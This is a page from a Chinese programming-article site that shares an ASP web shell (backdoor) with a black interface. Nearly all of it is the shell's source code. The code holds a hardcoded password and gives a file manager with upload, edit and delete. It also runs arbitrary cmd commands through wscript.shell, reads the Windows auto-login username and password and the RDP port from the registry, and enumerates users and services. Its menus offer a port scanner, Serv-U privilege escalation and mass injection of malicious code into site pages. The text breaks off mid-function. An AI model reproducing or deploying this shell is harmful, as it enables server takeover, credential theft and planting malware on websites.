欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

一款不错的asp木马 黑色界面

程序员文章站 2023-11-07 11:36:40
<% server.scripttimeout=999999999 response.buffer =true on error res...
<%
server.scripttimeout=999999999
response.buffer =true
on error resume next
userpass="643617"                           '密码
mname="by:.尐飛"           '后门名字
copyright="注:请勿用于非法用途,否则后果作者概不负责"       '版权

server.scripttimeout=999999999
response.buffer =true
on error resume next
sub showerr()
  if err then
    rrs"<br><a href='javascript:history.back()'><br> " & 
err.description & "</a><br>"
    err.clear:response.flush
  end if
end sub
sub rrs(str)
    response.write(str)
end sub
function repath(s)
  repath=replace(s,"\","\\")
end function
function rrepath(s)
  rrepath=replace(s,"\\","\")
end function
url=request.servervariables("url")
serverip=request.servervariables("local_addr")
action=request("action")
rootpath=server.mappath(".")
wwwroot=server.mappath("/")
serveru=request.servervariables("http_host")&url
serverp=userpass
folderpath=request("folderpath")
fname=request("fname")
backurl="<br><br><center><a href='javascript:history.back()'>返回
</a></center>"
rrs"<html><meta http-equiv=""content-type"" content=""text/html; 
charset=gb2312"">"
rrs"<title>"&mname1&" - "&serverip&" </title>"
rrs"<style type=""text/css"">"
rrs"body,td{font-size: 12px;background-color:#000000;color:#eee;}"
rrs"input,select,textarea{font-size: 12px;background-
color:#ddd;border:1px solid #fff}"
rrs".c{background-color:#000000;border:0px}"
rrs".cmd{background-color:#000;color:#fff}"
rrs"body{margin: 0px;margin-left:4px;}"
rrs"a{color:#ddd;text-decoration: none;}a:hover
{color:red;background:#000}"
rrs".am{color:#888;font-size:11px;}"
rrs"</style>"
rrs"<script language=javascript>function killerrors(){return true;}
window.onerror=killerrors;"
rrs"function yesok(){if (confirm(""确认要执行此操作吗?""))return 
true;else return false;}"
rrs"function runclock(){thetime = window.settimeout(""runclock()"", 
100);var today = new date();var display= today.tolocalestring
();window.status=""→"&ad&"  --""+display;}runclock();"
rrs"function showfolder(folder){top.addrform.folderpath.value = 
folder;top.addrform.submit();}"
rrs"function fullform(fname,faction){top.hideform.fname.value = 
fname;if(faction==""copyfile""){dname = prompt(""请输入复制到目标文件全
名称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefile""){dname = prompt(""请输入移动到目标文件全名
称"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""copyfolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""movefolder""){dname = prompt(""请输入移动到目标文件夹全名称
"",fname);top.hideform.fname.value += ""||||""+dname;}else if
(faction==""newfolder""){dname = prompt(""请输入要新建的文件夹全名
称"",fname);top.hideform.fname.value = dname;}else{dname = ""other"";}
if(dname!=null){top.hideform.action.value = 
faction;top.hideform.submit();}else{top.hideform.fname.value = """";}}"
rrs"</script>"
rrs "<body" 
if action="" then rrs " scroll=no"
rrs ">"
dim obt(13,2)
obt(0,0) = "scripting.filesystemobject"
  obt(0,2) = "文件操作组件"
obt(1,0) = "wscript.shell"
  obt(1,2) = "命令行执行组件"
obt(2,0) = "adox.catalog"
  obt(2,2) = "access建库组件"
obt(3,0) = "jro.jetengine"
  obt(3,2) = "access压缩组件"
obt(4,0) = "scripting.dictionary" 
  obt(4,2) = "数据流上传辅助组件"
obt(5,0) = "adodb.connection"
  obt(5,2) = "数据库连接组件"
obt(6,0) = "adodb.stream"
  obt(6,2) = "数据流上传组件"
obt(7,0) = "softartisans.fileup"
  obt(7,2) = "sa-fileup 文件上传组件"
obt(8,0) = "lyfupload.uploadfile"
  obt(8,2) = "刘云峰文件上传组件"
obt(9,0) = "persits.upload.1"
  obt(9,2) = "aspupload 文件上传组件"
obt(10,0) = "jmail.smtpmail"
  obt(10,2) = "jmail 邮件收发组件"
obt(11,0) = "cdonts.newmail"
  obt(11,2) = "虚拟smtp发信组件"
obt(12,0) = "smtpmail.smtpmail.1"
  obt(12,2) = "smtpmail发信组件"
obt(13,0) = "microsoft.xmlhttp"
  obt(13,2) = "数据传输组件"
for i=0 to 13
    set t=server.createobject(obt(i,0))
    if -2147221005 <> err then
      isobj=" √"
    else
      isobj=" ×"
      err.clear
    end if
    set t=nothing
    obt(i,1)=isobj
next
if folderpath<>"" then
  session("folderpath")=rrepath(folderpath)
end if
if session("folderpath")="" then
  folderpath=rootpath
  session("folderpath")=folderpath
end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&""" 
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%'  border=0 cellpadding='0' 
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"' 
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit' 
type='submit' value='转到'> <input type='submit' value='刷新主窗口' 
onclick='fileframe.location.reload()'>" 
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%' 
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%' 
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
if request("web")="admin" then
 session("web2a2dmin") = userpass
       url()
  end if
function mainform()
rrs"<form name=""hideform"" method=""post"" action="""&url&""" 
target=""fileframe"">"
rrs"<input type=""hidden"" name=""action"">"
rrs"<input type=""hidden"" name=""fname"">"
rrs"</form>"
rrs"<table width='100%' height='100%'  border=0 cellpadding='0' 
cellspacing='0'>"
rrs"<tr><td height='30' colspan='2'>"
rrs"<table width='100%'>"
rrs"<form name='addrform' method='post' action='"&url&"' 
target='_parent'>"
rrs"<tr><td width='60' align='center'>地址栏:</td><td>"
rrs"<input name='folderpath' style='width:100%' value='"&session
("folderpath")&"'>"
rrs"</td><td width='140' align='center'><input name='submit' 
type='submit' value='转到'> <input type='submit' value='刷新主窗口' 
onclick='fileframe.location.reload()'>" 
rrs"</td></tr></form></table></td></tr><tr><td width='170'>"
rrs"<iframe name='left' src='?action=mainmenu' width='100%' 
height='100%' frameborder='0'></iframe></td>"
rrs"<td>"
rrs"<iframe name='fileframe' src='?action=show1file' width='100%' 
height='100%' frameborder='1'></iframe>"
rrs"</td></tr></table>"
end function
function mainmenu()
rrs"<table width='100%' cellspacing='0' cellpadding='0'>"
rrs"<tr><td height='5'></td></tr>"
rrs"<tr><td><center><a href='"&siteurl2&"' target='_blank'><font 
color=red>"&mname2&"</font></center></a><hr hight=1 width='100%'>"
rrs"</td></tr>"
if obt(0,1)=" ×" then
rrs"<tr><td height='24'>无权限</td></tr>"
else
rrs"<tr><td height=22 onmouseover=""menu1.style.display=''""> ↓查看硬
盘<div id=menu1 style=""width:100%;display='none'"" 
onmouseout=""menu1.style.display='none'"">"
set abc=new lbf:rrs abc.showdriver():set abc=nothing
rrs"</div></td></tr><tr><td height='20'><a href='javascript:showfolder
("""&repath(wwwroot)&""")'>->站点根目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder("""&repath
(rootpath)&""")'>→本程序目录</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\program 
files"")'>→program files</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents 
and settings\\all users\\documents"")'>->documents</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents 
and settings\\all users\\application data\\symantec\\pcanywhere"")'>-
>pcanywhere</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:showfolder(""c:\\documents 
and settings\\all users\\「开始」菜单\\程序"")'>->开始 <b>→</b> 程序
<hr></a></td></tr>"
end if
rrs"<tr><td height='22'><a href='?action=course' target='fileframe'>→
系统服务-用户账号</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=getterminalinfo' 
target='fileframe'>→终端端口-自动登录</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=serverinfo' 
target='fileframe'>→服务信息-组件支持</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cmd1shell' target='fileframe'>
→执行cmd命令</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=scanport' target='fileframe'>
→端口扫描器</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=servu' target='fileframe'>→
serv-u提权</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=readreg' target='fileframe'>→
读取注册表</a></td></tr>"
rrs"<tr><td height='20'><a href='javascript:fullform("""&repath
(session("folderpath")&"\newfolder")&""",""newfolder"")'>→新建目录
<hr></a></td></tr>"
rrs"<tr><td height='20'><a href='?action=editfile' target='fileframe'>
→新建文本</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=upfile' target='fileframe'>→
上传文件</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=kmuma' target='fileframe'>→查
找木马</b></a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=1' target='fileframe'>
→高级挂马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=2' target='fileframe'>
→批量清马</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=cplgm&m=3' target='fileframe'>
→批量替换</a></td></tr>"
rrs"<tr><td height='22'><a href='?action=plgm' target='fileframe'></b>
→低级挂马</a></b></td></tr>"
rrs"<tr><td height='22'><a href='?action=logout' target='_top'>→退出登
录</a></td></tr>"
rrs"<tr><td align=center 
style='color:red'><hr>"&copyright2&"</td></tr></table>"
rrs"</table>"
end function
    sub unpack(thepath)
        on error resume next
        server.scripttimeout = 5000
        dim rs, ws, str, conn, stream, connstr, thefolder
        str = server.mappath(".") & "\"
        set rs = createobject("adodb.recordset")
        set stream = createobject("adodb.stream")
        set conn = createobject("adodb.connection")
        connstr = "provider=microsoft.jet.oledb.4.0;data 
source=" & thepath & ";"
        conn.open connstr
        rs.open "filedata", conn, 1, 1
        stream.open
        stream.type = 1
        do until rs.eof
            thefolder = left(rs("thepath"), instrrev(rs
("thepath"), "\"))
            if fsox.folderexists(str & thefolder) = false 
then
                createfolder(str & thefolder)
            end if
            stream.seteos()
            stream.write rs("filecontent")
            stream.savetofile str & rs("thepath"), 2
            rs.movenext
        loop
        rs.close
        conn.close
        stream.close
        set ws = nothing
        set rs = nothing
        set stream = nothing
        set conn = nothing
    end sub
    sub createfolder(thepath)
        dim i
        i = instr(thepath, "\")
        do while i > 0
            if fsox.folderexists(left(thepath, i)) = false 
then
                fsox.createfolder(left(thepath, i - 1))
            end if
            if instr(mid(thepath, i + 1), "\") then
                i = i + instr(mid(thepath, i + 1), "\")
             else
                i = 0
            end if
        loop
    end sub
function course()
si="<br><table width='600' bgcolor='menu' border='0' cellspacing='1' 
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>系
统用户与服务</td></tr>"
on error resume next
for each obj in getobject("winnt://.")
err.clear
if obj.starttype="" then
si=si&"<tr>"
si=si&"<td height=""20"" bgcolor=""#ffffff""> "
si=si&obj.name
si=si&"</td><td bgcolor=""#ffffff""> " 
si=si&"系统用户(组)"
si=si&"</td></tr>"
si0="<tr><td height=""20"" bgcolor=""#ffffff"" 
colspan=""2""> </td></tr>" 
end if
if obj.starttype=2 then lx="自动"
if obj.starttype=3 then lx="手动"
if obj.starttype=4 then lx="禁用"
if lcase(mid(obj.path,4,3))<>"win" and obj.starttype=2 then
si1=si1&"<tr><td height=""20"" 
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20"" 
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20"" 
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font 
color=#ff0000> "&obj.path&"</font></td></tr>"
else
si2=si2&"<tr><td height=""20"" 
bgcolor=""#ffffff""> "&obj.name&"</td><td height=""20"" 
bgcolor=""#ffffff""> "&obj.displayname&"<tr><td height=""20"" 
bgcolor=""#ffffff"" colspan=""2"">[启动类型:"&lx&"]<font 
color=#3399ff> "&obj.path&"</font></td></tr>"
end if
next
rrs si&si0&si1&si2&"</table>"
end function
function serverinfo()
si="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' 
cellpadding='0' align='center'>"
si=si&"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>服
务器组件信息</td></tr>"
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>服务器名</td><td bgcolor='#ffffff'> </td><td 
bgcolor='#ffffff'>"&request.servervariables("server_name")&"</td></tr>"
si=si&"<form method=post action='http://www.ip138.com/index.asp' 
name='ipform' target='_blank'><tr align='center'><td height='20' 
width='200' bgcolor='#ffffff'>服务器ip</td><td 
bgcolor='#ffffff'> </td><td bgcolor='#ffffff'>"
si=si&"<input type='text' name='ip' size='15' 
value='"&request.servervariables("local_addr")
&"'style='border:0px'><input type='submit' value='查
询'style='border:0px'><input type='hidden' name='action' 
value='2'></td></tr></form>"
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>服务器时间</td><td bgcolor='#ffffff'> </td><td 
bgcolor='#ffffff'>"&now&" </td></tr>"
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>服务器cpu数量</td><td 
bgcolor='#ffffff'> </td><td 
bgcolor='#ffffff'>"&request.servervariables("number_of_processors")
&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>服务器操作系统</td><td 
bgcolor='#ffffff'> </td><td 
bgcolor='#ffffff'>"&request.servervariables("os")&"</td></tr>"
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>web服务器版本</td><td 
bgcolor='#ffffff'> </td><td 
bgcolor='#ffffff'>"&request.servervariables("server_software")
&"</td></tr>"
for i=0 to 13
si=si&"<tr align='center'><td height='20' width='200' 
bgcolor='#ffffff'>"&obt(i,0)&"</td><td bgcolor='#ffffff'>"&obt(i,1)
&"</td><td bgcolor='#ffffff' align=left>"&obt(i,2)&"</td></tr>"
next
rrs si
end function
function downfile(path)
response.clear
set osm = createobject(obt(6,0))
osm.open
osm.type = 1
osm.loadfromfile path
sz=instrrev(path,"\")+1
response.addheader "content-disposition", "attachment; filename=" & 
mid(path,sz)
response.addheader "content-length", osm.size
response.charset = "utf-8"
response.contenttype = "application/octet-stream"
response.binarywrite osm.read
response.flush
osm.close
set osm = nothing
end function
function htmlencode(s)
  if not isnull(s) then
    s = replace(s, ">", ">")
    s = replace(s, "<", "<")
    s = replace(s, chr(39), "'")
    s = replace(s, chr(34), """)
    s = replace(s, chr(20), " ")
    htmlencode = s
  end if
end function
function upfile()
  if request("action2")="post" then
    set u=new upc : set f=u.ua("localfile")
    uname=u.form("topath")
    if uname="" or f.filesize=0 then
      si="<br>请输入上传的完全路径后选择一个文件上传!"
    else
        f.saveas uname
        if err.number=0 then
          si="<center><br><br><br>文件"&uname&"上传成功!</center>"
        end if
    end if
    set f=nothing:set u=nothing
    si=si&backurl
    rrs si
    showerr()
    response.end
  end if
    si="<br><br><br><table border='0' cellpadding='0' cellspacing='0' 
align='center'>"
    si=si&"<form name='upform' method='post' action='"&url&"?
action=upfile&action2=post' enctype='multipart/form-data'>"
    si=si&"<tr><td>"
    si=si&"上传路径:<input name='topath' value='"&rrepath(session
("folderpath")&"\diy3.asp")&"' size='40'>"
    si=si&" <input name='localfile' type='file'  size='25'>"
    si=si&" <input type='submit' name='submit' value='上传'>"
    si=si&"</td></tr></form></table>"
  rrs si
end function
function cmd1shell()
checked=" checked"
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = "diy3.asp"
if request("wscript")<>"yes" then checked=""
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"' 
style='width:70%'>  "
si=si&"<input class=c type='checkbox' name='wscript' 
value='yes'"&checked&">wscript.shell"
si=si&"<input name='cmd' style='width:92%' value='"&defcmd&"'> <input 
type='submit' value='执行'><textarea style='width:100%;height:440;' 
class='cmd'>"
if request.form("cmd")<>"" then
if request.form("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=cm.exec(shellpath&" /c "&defcmd)
aaa=dd.stdout.readall
si=si&aaa
else
on error resume next
set ws=server.createobject("wscript.shell")
set ws=server.createobject("wscript.shell")
set fso=server.createobject("scripting.filesystemobject")
sztempfile = server.mappath("cmd.txt")
call ws.run (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject("scripting.filesystemobject")
set ofilelcx = fs.opentextfile (sztempfile, 1, false, 0)
aaa=server.htmlencode(ofilelcx.readall)
ofilelcx.close
call fso.deletefile(sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea></form>"
rrs si
end function
if session("web2a2dmin")<>userpass then
if request.form("pass")<>"" then
if request.form("pass")=userpass then
session("web2a2dmin")=userpass
response.redirect url
else
 rrs"<br><br><br><b><div align=center><font size='14' color='red'>注:
请勿用于非法用途,否则后果自负!!!</font></b> <br><br><br><br><b><div 
align=center><font size='14' color='lime'>hack by:漫步云端
</font></b></p>"
end if
else
si="<center><div style='width:500px;border:1px solid 
#222;padding:22px;margin:100px;'><br><a href='"&siteurl&"' 
target='_blank'>"&mname&"</a><hr><form action='"&url&"' method='post'>
密码:<input name='pass' type='password' size='22'> <input 
type='submit' value='登录'><hr>"&copyright&"</center>"
if instr(si,sic)<>0 then rrs si
end if
response.end
end if
dim t1
class upc
  dim d1,d2
  public function form(f)
    f=lcase(f)
    if d1.exists(f) then:form=d1(f):else:form="":end if
  end function
  public function ua(f)
    f=lcase(f)
    if d2.exists(f) then:set ua=d2(f):else:set ua=new fif:end if
  end function
  private sub class_initialize
  dim 
tda,tst,vbcrlf,tin,diend,t2,tlen,tfl,sfv,fstart,fend,dstart,dend,upname
    set d1=createobject(obt(4,0))
    if request.totalbytes<1 then exit sub
    set t1 = createobject(obt(6,0))
    t1.type = 1 : t1.mode =3 : t1.open
    t1.write  request.binaryread(request.totalbytes)
    t1.position=0 : tda =t1.read : dstart = 1
    dend = lenb(tda)
    set d2=createobject(obt(4,0))
    vbcrlf = chrb(13) & chrb(10)
    set t2 = createobject(obt(6,0))
    tst = midb(tda,1, instrb(dstart,tda,vbcrlf)-1)
    tlen = lenb (tst)
    dstart=dstart+tlen+1
    while (dstart + 10) < dend
      diend = instrb(dstart,tda,vbcrlf & vbcrlf)+3
      t2.type = 1 : t2.mode =3 : t2.open
      t1.position = dstart
      t1.copyto t2,diend-dstart
      t2.position = 0 : t2.type = 2 : t2.charset ="gb2312"
      tin = t2.readtext : t2.close
      dstart = instrb(diend,tda,tst)
      fstart = instr(22,tin,"name=""",1)+6
      fend = instr(fstart,tin,"""",1)
      upname = lcase(mid (tin,fstart,fend-fstart))
      if instr (45,tin,"filename=""",1) > 0 then
        set tfl=new fif
        fstart = instr(fend,tin,"filename=""",1)+10
        fend = instr(fstart,tin,"""",1)
        fstart = instr(fend,tin,"content-type: ",1)+14
        fend = instr(fstart,tin,vbcr)
        tfl.filestart =diend
        tfl.filesize = dstart -diend -3
        if not d2.exists(upname) then
          d2.add upname,tfl
        end if
      else
        t2.type =1 : t2.mode =3 : t2.open
        t1.position = diend : t1.copyto t2,dstart-diend-3
        t2.position = 0 : t2.type = 2
        t2.charset ="gb2312"
        sfv = t2.readtext
        t2.close
        if d1.exists(upname) then
          d1(upname)=d1(upname)&", "&sfv
        else
          d1.add upname,sfv
        end if
      end if
      dstart=dstart+tlen+1
    wend
    tda=""
    set t2 =nothing
  end sub
  private sub class_terminate
    if request.totalbytes>0 then
      d1.removeall:d2.removeall
      set d1=nothing:set d2=nothing
      t1.close:set t1 =nothing
    end if
  end sub
end class
class fif
dim filesize,filestart
  private sub class_initialize
  filesize = 0
  filestart= 0
  end sub
  public function saveas(f)
  dim t3
  saveas=true
  if trim(f)="" or filestart=0 then exit function
  set t3=createobject(obt(6,0))
     t3.mode=3 : t3.type=1 : t3.open
     t1.position=filestart
     t1.copyto t3,filesize
     t3.savetofile f,2
     t3.close
     set t3=nothing
     saveas=false
   end function
end class
class lbf
  dim cf
  private sub class_initialize
    set cf=createobject(obt(0,0))
  end sub
  private sub class_terminate
    set cf=nothing
  end sub
  function showdriver()
    for each d in cf.drives
      rrs"   <a href='javascript:showfolder
("""&d.driveletter&":\\"")'>本地磁盘 ("&d.driveletter&":)</a><br>" 
    next
  end function
  function show1file(path)
  set fold=cf.getfolder(path)
  i=0
    si="<table width='100%' border='0' cellspacing='0' 
cellpadding='0'><tr>"
  for each f in fold.subfolders
    si=si&"<td height=10>"
    si=si&"<a href='javascript:showfolder("""&repath(path&"\"&f.name)
&""")' title=""打开""><font face='wingdings' 
size='6'>0</font>"&f.name&"</a>" 
    si=si&" _<a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""copyfolder"")'  onclick='return yesok()' 
class='am' title='复制'>复制</a>"
    si=si&"  <a href='javascript:fullform("""&replace
(path&"\"&f.name,"\","\\")&""",""delfolder"")'  onclick='return yesok
()' class='am' title='删除'>删除</a>"
    si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""movefolder"")'  onclick='return yesok()' 
class='am' title='移动'>移动</a>"
    si=si&" <a href='javascript:fullform("""&repath
(path&"\"&f.name)&""",""downfile"")'  onclick='return yesok()' 
class='am' title='下载'>下载</a></td>"
    i=i+1
    if i mod 3 = 0 then si=si&"</tr><tr>"
  next
    si=si&"</tr><tr><td height=2></td></tr></table>"
    rrs si &"<hr noshade color=""#cccccc"" size=1 color=""#"" />" : 
si=""
  for each l in fold.files
    si="<table width='100%' border='0' cellspacing='0' 
cellpadding='0'>"
    si=si&"<tr style='boungroup-color:#'>"
    si=si&"<td height='30'><a href='javascript:fullform("""&repath
(path&"\"&l.name)&""",""downfile"");' title='下载'><font 
face='wingdings' size='4'>2</font>"&l.name&"</a></td>"
    si=si&"<td width='40' align=""center""><a 
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""editfile"")' class='am' title='编辑'>编辑</a></td>"
    si=si&"<td width='40' align=""center""><a 
href='javascript:fullform("""&repath(path&"\"&l.name)&""",""delfile"")' 
 onclick='return yesok()' class='am' title='删除'>删除</a></td>"
    si=si&"<td width='40' align=""center""><a 
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""copyfile"")' class='am' title='复制'>复制</a></td>"
    si=si&"<td width='40' align=""center""><a 
href='javascript:fullform("""&repath(path&"\"&l.name)
&""",""movefile"")' class='am' title='移动'>移动</a></td>"    
    si=si&"<td width='50' align=""center"">"&clng(l.size/1024)&"k</td>"
    si=si&"<td width='200' align=""center"">"&l.type&"</td>"
    si=si&"<td width='160'>"&l.datelastmodified&"</td>"
    si=si&"</tr></table>"
    rrs si:si=""
  next
  set fold=nothing
  end function
  function delfile(path)
if cf.fileexists(path) then
cf.deletefile path
si="<center><br><br><br>文件 "&path&" 删除成功!</center>"
si=si&backurl
rrs si
end if
  end function
  function editfile(path)
if request("action2")="post" then
set t=cf.createtextfile(path)
t.writeline request.form("content")
t.close
set t=nothing
si="<center><br><br><br>文件保存成功!</center>"
si=si&backurl
rrs si
response.end
end if
if path<>"" then
set t=cf.opentextfile(path, 1, false)
txt=htmlencode(t.readall) 
t.close
set t=nothing
else
path=session("folderpath")&"\newfile.asp":txt="新建文件"
end if
si=si&"<form action='"&url&"?action2=post' method='post' 
name='editform'>"
si=si&"<input name='action' value='editfile' type='hidden'>"
si=si&"<input name='fname' value='"&path&"' style='width:100%'><br>"
si=si&"<textarea name='content' 
style='width:100%;height:450'>"&txt&"</textarea><br>"
si=si&"<hr><input name='goback' type='button' value='返回' 
onclick='history.back();'>   <input name='reset' 
type='reset' value='重置'>   <input name='submit' 
type='submit' value='保存'></form>"
rrs si
  end function
  function copyfile(path)
  path = split(path,"||||")
    if cf.fileexists(path(0)) and path(1)<>"" then
      cf.copyfile path(0),path(1)
      si="<center><br><br><br>文件"&path(0)&"复制成功!</center>"
      si=si&backurl
      rrs si 
    end if
  end function
  function movefile(path)
  path = split(path,"||||")
    if cf.fileexists(path(0)) and path(1)<>"" then
      cf.movefile path(0),path(1)
      si="<center><br><br><br>文件"&path(0)&"移动成功!</center>"
      si=si&backurl
      rrs si 
    end if
  end function
  function delfolder(path)
    if cf.folderexists(path) then
      cf.deletefolder path
      si="<center><br><br><br>目录"&path&"删除成功!</center>"
      si=si&backurl
      rrs si
    end if
  end function
  function copyfolder(path)
  path = split(path,"||||")
    if cf.folderexists(path(0)) and path(1)<>"" then
      cf.copyfolder path(0),path(1)
      si="<center><br><br><br>目录"&path(0)&"复制成功!</center>"
      si=si&backurl
      rrs si
    end if
  end function
  function movefolder(path)
  path = split(path,"||||")
    if cf.folderexists(path(0)) and path(1)<>"" then
      cf.movefolder path(0),path(1)
      si="<center><br><br><br>目录"&path(0)&"移动成功!</center>"
      si=si&backurl
      rrs si
    end if
  end function
  function newfolder(path)
    if not cf.folderexists(path) and path<>"" then
      cf.createfolder path
      si="<center><br><br><br>目录"&path&"新建成功!</center>"
      si=si&backurl
      rrs si
    end if
  end function
end class
sub getterminalinfo()
on error resume next
set wsx = server.createobject("wscript.shell")
dim terminalportpath, terminalportkey, termport
dim autologinpath, autologinuserkey, autologinpasskey
dim isautologinenable, autologinenablekey, autologinusername, 
autologinpassword
terminalportpath = "hklm\system\currentcontrolset\control\terminal 
server\winstations\rdp-tcp\"
terminalportkey = "portnumber"
termport = wsx.regread(terminalportpath & terminalportkey)
rrs "终端服务端口及自动登录<hr/><ol>"
if termport = "" or err.number <> 0 then 
rrs"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
 else
rrs "当前终端服务端口: " & termport & "<br/>"
end if
autologinpath = "hkey_local_machine\software\microsoft\windows 
nt\currentversion\winlogon\"
autologinenablekey = "autoadminlogon"
autologinuserkey = "defaultusername"
autologinpasskey = "defaultpassword"
isautologinenable = wsx.regread(autologinpath & autologinenablekey)
if isautologinenable = 0 then
rrs "系统自动登录功能未开启<br/>"
else
autologinusername = wsx.regread(autologinpath & autologinuserkey)
rrs "自动登录的系统帐户: " & autologinusername & "<br>"
autologinpassword = wsx.regread(autologinpath & autologinpasskey)
if err then
err.clear
rrs "false"
end if
rrs "自动登录的帐户密码: " & autologinpassword & "<br>"
end if
rrs "</ol>"
end sub
sub readreg()
rrs "注册表键值读取:<hr/>"
rrs "<form method=post>"
rrs "<input type=hidden value=readreg name=theact>"
rrs "<input name=thepath 
value='hklm\system\currentcontrolset\control\computername\computername\
computername' size=80>"
rrs " <input type=submit value=' 读取 '>"
rrs "<span id=regeditinfo style='display:none;'><hr/>"
rrs "hklm\software\microsoft\windows\currentversion\winlogon\dont-
displaylastusername,reg_sz,1 {不显示上次登录用户}<br/>"
rrs 
"hklm\system\currentcontrolset\control\lsa\restrictanonymous,reg_dword,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机ipc$共享
}<br/>"
rrs 
"hklm\system\currentcontrolset\services\lanmanserver\parameters\autosha
reserver,reg_dword,0 {禁止默认共享}<br/>"
rrs 
"hklm\system\currentcontrolset\services\lanmanserver\parameters\enables
harednetdrives,reg_sz,0 {关闭网络共享}<br/>"
rrs 
"hklm\system\currentcontrolset\services\tcpip\parameters\enablesecurity
filters,reg_dword,1 {启用tcp/ip筛选(所有试配器)}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\ipenablerouter,reg_dword,1 {允许ip路由}
<br/>"
rrs "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
rrs 
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\defaultgateway,reg_muti_sz {默认网
关}<br/>"
rrs 
"hklm\system\currentcontrolset\services\tcpip\parameters\interfaces\{8a
465128-8e99-4b0c-aff3-1348dc55eb2e}\nameserver {首dns}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\tcpallowedports {允许的tcp/ip端口}<br/>"
rrs "hklm\system\controlset001
\services\tcpip\parameters\interfaces\{8a465128-8e99-4b0c-aff3-
1348dc55eb2e}\udpallowedports {允许的udp端口}<br/>"
rrs "-----------over--------------------<br/>"
rrs "hklm\system\controlset001\services\tcpip\enum\count {共几块活动网
卡}<br/>"
rrs "hklm\system\controlset001\services\tcpip\linkage\bind {当前网卡的
序列(把上面的替换)}<br/>"
rrs "</span>"
rrs "</form><hr/>"
if request("thepath")<>"" then
on error resume next
set wsx = server.createobject("wscript.shell")
thepath=request("thepath")
thearray=wsx.regread(thepath)
if isarray(thearray) then
for i=0 to ubound(thearray)
rrs "<li>" & thearray(i)
next
 else
rrs "<li>" & thearray
end if
end if
end sub
sub scanport()
server.scripttimeout = 7776000
if request.form("port")="" then
portlist="21,23,25,80,110,135,139,445,1433,3389,43958"
else
portlist=request.form("port")
end if
if request.form("ip")="" then
ip="127.0.0.1"
else
ip=request.form("ip")
end if
rrs"<p>端口扫描器</p>"
rrs"<form name='form1' method='post' action='' 
onsubmit='form1.submit.disabled=true;'>"
rrs"<p>scan ip: "
rrs" <input name='ip' type='text' class='textbox' id='ip' 
value='"&request.servervariables("local_addr")&"' size='60'>"
rrs"<br>port list:"
rrs"<input name='port' type='text' class='textbox' size='60' 
value='"&portlist&"'>"
rrs"<br><br>"
rrs"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
rrs"<input name='scan' type='hidden' id='scan' value='111'>"
rrs"</p></form>"
if request.form("scan") <> "" then
timer1 = timer
